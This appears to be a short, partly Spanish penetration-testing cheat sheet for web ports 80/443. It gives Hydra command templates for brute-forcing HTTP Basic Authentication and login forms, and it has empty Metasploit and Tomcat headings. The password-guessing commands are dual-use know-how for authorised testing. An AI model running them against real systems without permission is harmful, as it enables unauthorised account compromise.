80/TCP, 443/TCP (HTTP/S)
HTTP, Hypertext Transfer Protocol. HTTPS, Hypertext Transfer Protocol Secure.
Hydra
Basic HTTP Authentication
hydra -C <path-wordlist> <target> http-get / -f -VMétodo HTTP GET
hydra -L <path-users> -P <path-passwords> <target> http-get-form "/login.php:username=^USER^&password=^PASS^:<incorrect-reply-message>" -f -VMétodo HTTP POST
Metasploit
Apache Tomcat
Última actualización